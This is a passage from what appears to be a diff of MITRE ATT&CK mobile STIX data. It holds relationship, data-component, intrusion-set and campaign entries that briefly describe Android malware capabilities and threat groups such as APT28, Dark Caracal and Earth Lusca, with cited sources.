"Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:36:27.983Z", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) collects call logs.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--084786ee-9384-4a00-9e1b-48f94ea70126", + "created": "2019-09-03T19:45:48.517Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. 
Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:09:45.426Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can exfiltrate calendar events.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--03172b09-4f97-4fb8-95f0-92b2d8957408", + "created": "2020-06-26T14:55:13.349Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[EventBot](https://attack.mitre.org/software/S0478) has encrypted base64-encoded payload data using RC4 and Curve25519.(Citation: Cybereason EventBot)", + "modified": "2022-04-18T15:57:14.375Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--48486680-530c-4ed9-aca3-94969aa262b6", + "created": "2019-07-10T15:35:43.665Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:38:00.609Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) accesses and exfiltrates the call log.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a610208-06af-425f-a9af-cd0899261e33", + "type": "relationship", + "created": "2020-09-11T15:45:38.450Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." 
+ } + ], + "modified": "2020-09-11T15:45:38.450Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can send SMS messages.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0291c9d5-8977-420d-8374-b786e3095a73", + "created": "2023-03-20T18:49:53.204Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:49:53.204Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3e5b5c7a-32e1-4745-8ceb-c46ce7276364", + "created": "2023-02-06T19:46:19.592Z", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. 
Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:46:19.592Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) has C2 commands to add an infected device to a DDoS pool.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--d2e112dc-f6d4-488d-b8df-ecbfb57a0a2d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5dc4eaca-ff82-412a-a8dd-168de1857d8c", + "created": "2023-01-18T21:38:58.113Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. 
Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:49:16.069Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use input injection via Accessibility Services to simulate user touch inputs, prevent applications from opening, change device settings, and bypass MFA protections.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T19:59:14.491Z", + "name": "API Calls", + "description": "API calls utilized by an application that could indicate malicious activity", + "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "created": "2023-03-13T19:59:14.491Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T20:48:14.540Z", + "name": "System Settings", + "description": "Settings visible to the user on the device", + "x_mitre_data_source_ref": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + 
"x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "created": "2023-03-13T20:48:14.540Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "aliases": [ + "Windshift", + "Bahamut" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "type": "intrusion-set", + "created": "2020-06-25T17:16:39.168Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0112", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0112" + }, + { + "source_name": "Bahamut", + "description": "(Citation: SANS Windshift August 2018)" + }, + { + "source_name": "SANS Windshift August 2018", + "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf", + "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020." + }, + { + "source_name": "objective-see windtail1 dec 2018", + "url": "https://objective-see.com/blog/blog_0x3B.html", + "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019." + }, + { + "source_name": "objective-see windtail2 jan 2019", + "url": "https://objective-see.com/blog/blog_0x3D.html", + "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). 
Retrieved October 3, 2019." + } + ], + "modified": "2021-04-26T14:37:33.234Z", + "name": "Windshift", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "aliases": [ + "Dark Caracal" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12", + "type": "intrusion-set", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0070", + "external_id": "G0070" + }, + { + "source_name": "Dark Caracal", + "description": "(Citation: Lookout Dark Caracal Jan 2018)" + }, + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2021-10-11T19:08:18.503Z", + "name": "Dark Caracal", + "description": "[Dark Caracal](https://attack.mitre.org/groups/G0070) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. 
(Citation: Lookout Dark Caracal Jan 2018)", + "x_mitre_version": "1.3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Metadata", + "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-20T20:22:45.613Z", + "name": "Host Status", + "description": "Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)", + "x_mitre_data_source_ref": "x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T20:00:08.487Z", + "name": "Permissions Requests", + "description": "Permissions declared in an application's manifest or property list file", + "x_mitre_data_source_ref": 
"x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "created": "2023-03-13T20:00:08.487Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-17T19:51:56.531Z", + "name": "Earth Lusca", + "description": "[Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)\n\n[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)", + "aliases": [ + "Earth Lusca", + "TAG-22" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "intrusion-set", + "id": "intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034", + "created": "2022-07-01T20:12:30.184Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1006", + "external_id": "G1006" + }, + { + "source_name": "TAG-22", + "description": "(Citation: Recorded Future TAG-22 July 2021)" + }, + { + "source_name": "TrendMicro EarthLusca 2022", + "description": "Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.", + "url": "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf" + }, + { + "source_name": "Recorded Future TAG-22 July 2021", + "description": "INSIKT GROUP. (2021, July 8). 
Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.", + "url": "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Flow", + "description": "Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-20T20:18:06.745Z", + "name": "Network Connection Creation", + "description": "Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + 
"object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T20:47:52.557Z", + "name": "System Notifications", + "description": "Notifications generated by the OS", + "x_mitre_data_source_ref": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "created": "2023-03-13T20:47:52.557Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-09-30T21:05:22.490Z", + "name": "Operation Dust Storm", + "description": "[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. 
By 2015, the [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.(Citation: Cylance Dust Storm)\n\n[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.(Citation: Cylance Dust Storm)", + "aliases": [ + "Operation Dust Storm" + ], + "first_seen": "2010-01-01T07:00:00.000Z", + "last_seen": "2016-02-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Cylance Dust Storm)", + "x_mitre_last_seen_citation": "(Citation: Cylance Dust Storm)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "created": "2022-09-29T20:00:38.136Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0016", + "external_id": "C0016" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. 
Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ] + }, + { + "modified": "2023-03-13T19:59:42.141Z", + "name": "Network Communication", + "description": "Network requests made by an application or domains contacted", + "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "created": "2023-03-13T19:59:42.141Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Termination", + "description": "Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T20:47:24.038Z", + "name": "Permissions Request", + "description": "System prompts triggered when an application requests new or additional permissions", + "x_mitre_data_source_ref": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456", + "created": "2023-03-13T20:47:24.038Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-26T17:51:20.401Z", + "name": "APT28", + "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. 
(Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). ", + "aliases": [ + "APT28", + "IRON TWILIGHT", + "SNAKEMACKEREL", + "Swallowtail", + "Group 74", + "Sednit", + "Sofacy", + "Pawn Storm", + "Fancy Bear", + "STRONTIUM", + "Tsar Team", + "Threat Group-4127", + "TG-4127" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "4.0", + "x_mitre_contributors": [ + "Sébastien Ruel, CGI", + "Drew Church, Splunk", + "Emily Ratliff, IBM", + "Richard Gold, Digital Shadows" + ], + "type": "intrusion-set", + "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "created": "2017-05-31T21:31:48.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0007", + "external_id": "G0007" + }, + { + "source_name": "SNAKEMACKEREL", + "description": "(Citation: Accenture SNAKEMACKEREL Nov 2018)" + }, + { + "source_name": "Fancy Bear", + "description": "(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)" + }, + { + "source_name": "Tsar Team", + 
